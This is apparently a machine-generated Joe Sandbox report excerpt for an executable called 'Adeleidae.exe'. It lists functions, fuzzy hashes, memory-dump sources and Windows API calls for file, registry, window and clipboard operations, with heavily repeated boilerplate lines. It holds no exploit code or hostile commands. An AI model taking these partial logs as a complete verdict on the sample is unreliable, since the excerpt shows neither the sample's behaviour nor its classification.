Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: e1b0357d7dd7ae1d86e72c14d3f4c1d25802a01c5ec69123f4cd8e600442627b
Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
Opcode Fuzzy Hash: e1b0357d7dd7ae1d86e72c14d3f4c1d25802a01c5ec69123f4cd8e600442627b
Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D

Function 00405C2A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Adeleidae.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Function 00405C05 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040580A,?,?,00000000,004059E0,?,?,?,?), ref: 00405C0A
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C1E

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: 468109bf43167ec42dafbdb034993651ba0ea03f7208bcc181294849b19367e8
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 22D0C972504520ABC6102728EE0889BBB95EB542717024B35FAA9A22B0CB304C568A98

Function 00405700 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
GetLastError.KERNEL32 ref: 00405714

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768

Function 00405CDC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4

Function 00405CAD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4

Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
Instruction ID: df176f915953132b0bb271560c482e71de85830ffa73b9ff1be2ff384974574c
Opcode Fuzzy Hash: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
Instruction Fuzzy Hash: 4AE04F30800208BBDF01AFA4CE49DBD3B79AF00344F14043AF940AB0D5E7F89A819749

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6856b2a6853cfed7dbe1fff2f5d824482863d63baf729e56f82695697e155cc2
Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
Opcode Fuzzy Hash: 6856b2a6853cfed7dbe1fff2f5d824482863d63baf729e56f82695697e155cc2
Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D

Function 00404165 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404177

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
Instruction ID: 76ab245bb7d1846facc95ba49394d78ca693920881c876aece34d531b1437416
Opcode Fuzzy Hash: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
Instruction Fuzzy Hash: 9EC09B717407007FDA118F60AD49F1777646B54741F1484397340F50E0C774E450D61C

Function 0040414E Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08

Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Non-executed Functions

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405351
GetDlgItem.USER32(?,000003EE), ref: 00405360
GetClientRect.USER32(?,?), ref: 0040539D
GetSystemMetrics.USER32(00000002), ref: 004053A4
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
ShowWindow.USER32(?,00000008), ref: 00405440
GetDlgItem.USER32(?,000003EC), ref: 00405461
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
GetDlgItem.USER32(?,000003F8), ref: 0040536F

Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

GetDlgItem.USER32(?,000003EC), ref: 004054B3
CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
CloseHandle.KERNEL32(00000000), ref: 004054C8
ShowWindow.USER32(00000000), ref: 004054EC
ShowWindow.USER32(00000000,00000008), ref: 004054F1
ShowWindow.USER32(00000008), ref: 0040553B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
CreatePopupMenu.USER32 ref: 00405580
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
GetWindowRect.USER32(?,?), ref: 004055B4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
OpenClipboard.USER32(00000000), ref: 00405615
EmptyClipboard.USER32 ref: 0040561B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
GlobalLock.KERNEL32(00000000), ref: 00405631
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
GlobalUnlock.KERNEL32(00000000), ref: 00405665
SetClipboardData.USER32(0000000D,00000000), ref: 00405670
CloseClipboard.USER32 ref: 00405676

Strings

{, xrefs: 00405559

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

Function 004045B4 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404603
SetWindowTextW.USER32(00000000,?), ref: 0040462D
SHBrowseForFolderW.SHELL32(?), ref: 004046DE
CoTaskMemFree.OLE32(00000000), ref: 004046E9
lstrcmpiW.KERNEL32(Space required: ,0042D268,00000000,?,?), ref: 0040471B
lstrcatW.KERNEL32(?,Space required: ), ref: 00404727
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739

Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791

